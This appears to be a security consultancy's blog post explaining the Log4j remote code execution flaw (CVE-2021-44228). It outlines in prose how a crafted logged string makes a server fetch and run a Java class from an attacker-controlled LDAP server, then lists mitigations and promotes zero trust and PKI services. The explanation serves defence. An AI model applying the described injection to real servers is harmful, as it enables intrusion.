Read time: 5 minutes
In the last month, you have likely seen the Log4j exploit in the news. A critical Remote code execution vulnerability, CVE-2021-44228, was discovered in December in Apache Log4j and it has affected millions of servers. Cloudflare has declared that the company has tracked more than 100k attempts per hour to exploit this vulnerability. Microsoft has observed that the vulnerability is being used by multiple nation-state hacking groups from China, North Korea, Iran, and Turkey. The exploitation attempts were high during the last week of December as well.
What is Log4j?
Apache Log4j is an open-source logging library that is widely used in almost every environment where a Java application is in use. This includes enterprise applications, cloud services, web applications, email services, and open-source software. This library is used to log security and performance information.
What is the issue?
The vulnerability leverages JNDI (Java Naming and Directory Interface) lookups, that are allowed in the default configuration of Log4j. JNDI is a Java API that clients use to lookup data and objects stored in different directory and naming services such as Lightweight Directory Access Protocol (LDAP), Domain Name System (DNS), and Remote Method Invocation (RMI). The API uses a string as an input parameter and this input parameter can be exploited by a remote attacker to execute arbitrary code. Log4j does not sanitize the input parameters, allowing an attacker to provide a string as a variable that could be used to load and invoke a remote Java class file. An attacker with the ability to control log messages can execute remote code loaded from LDAP servers when message lookup substitution is enabled and gain full control of the affected server. An attacker can exploit this vulnerability by following the below steps:
- An attacker creates a specially crafted string containing the malicious payload and sends it to a vulnerable system. This string could be inserted in any of the fields that the system logs such as
- User Agent
- Device Name or email address
- The string points to an attacker controlled LDAP or DNS server, such as
This string is then sent to Log4j for logging
- The vulnerable system uses JNDI to query the attacker-controlled LDAP or DNS server.
- The attacker-controlled LDAP or DNS server responds with a remote Java class file (exploit.class)
- The Java class is downloaded and executed.
Severity of the issue
The impact of the exploit is very broad due to the nature of the vulnerability. Log4j is widely used by developers and to exploit the vulnerability, an attacker only needs to exploit the target system to log a specially crafted message. Attackers are extensively exploiting this vulnerability for crypto mining and other types of malware attacks. Cybercriminals exploit a new vulnerability to take advantage of it before it is remediated. In the case of Log4j, as it is so widely used by developers in almost every Java application, it provides a larger window for cybercriminals to exploit this vulnerability before the organization can patch their entire network and applications on the network. Security experts have warned that because of the Java packing, the vulnerability could be several layers deep within the applications and not easily detected by scanners. Though the exploit is currently aimed at crypto mining, it could be exploited by serious threat actors to attack high-value targets such as financial institutions and federal agencies. Attackers are scanning both Windows and Linux systems for this vulnerability.
How to mitigate the risk?
An organization can follow the below recommendations to handle this vulnerability:
- In order for an organization to identify the affected applications and systems, scanning tools and scripts must be deployed to detect vulnerable systems in the environment.
- As a workaround, the JndiLookup class can be removed from the class path.
- Apply the corresponding security patches for public-facing applications and systems immediately.
- Apply the corresponding security patches for internal applications and systems as soon as possible.
- Check your network perimeter logs for indicators of compromise.
- If you are using a WAF, create rules specific to log4j.
- Isolate the vulnerable systems through network segmentation or other means.
- Monitor for suspicious activities with particular attention to applications that establish remote connections.
- Consider implementing zero trust architecture.
Zero Trust Architecture
An important element in all malware attacks is that the attacker uses the organization’s applications and systems against the organization itself. Organizations should consider implementing zero trust architecture to protect the organization from its own applications and systems. Zero trust is an approach that secures an organization by rejecting implicit trust and continuously validating every request. It is based on the principle of “never trust, always verify”. Every access request is first authenticated, authorized, and encrypted before providing access to the resource. Zero trust architecture is based on three key principles:
- Verify explicitly
Always authenticate and authorize requests based on user identity, device, location, service, workload, and other parameters.
- Use least privilege
Restrict user’s access to only those resources required for the job role. Use risk-based policies and data protection to secure data and systems.
- Assume breach and inspect every activity
Use analytics to get visibility of the network, systems, and applications, and improve defenses.
Identity has become the new network perimeter and verification of these identities is central to the zero-trust architecture. Instead of identification based on IP address, it’s based on verifying the user’s identity using Identity and Access Management (IAM), Multi-Factor authentication (MFA) and Public Key Cryptography (PKI). In addition to identity verification, organizations need to ensure device verification as well by using certificates and key pairs, to strengthen the security of the organization. Data needs to be protected when at rest and in transit. This makes encryption, especially PKI, an important part in implementing zero-trust architecture. PKI allows an organization to establish machine identity and encrypts communications between networks. Organizations can use PKI to issue digital certificates to users, machines, web applications and mobile devices, to provide secure network authentication.
Organizations need to strengthen the security of their systems and applications against such vulnerabilities and exploits, and to do this they need to move towards a zero-trust architecture. Implementing a PKI is important for zero trust architecture and ensuring secure network authentication for users, systems, and web applications. Encryption Consulting is a customer-focused cyber security consulting firm providing services to various clients on implementing and managing PKI in their environments. To see how we can help your organization, visit our website at www.encryptionconsulting.com.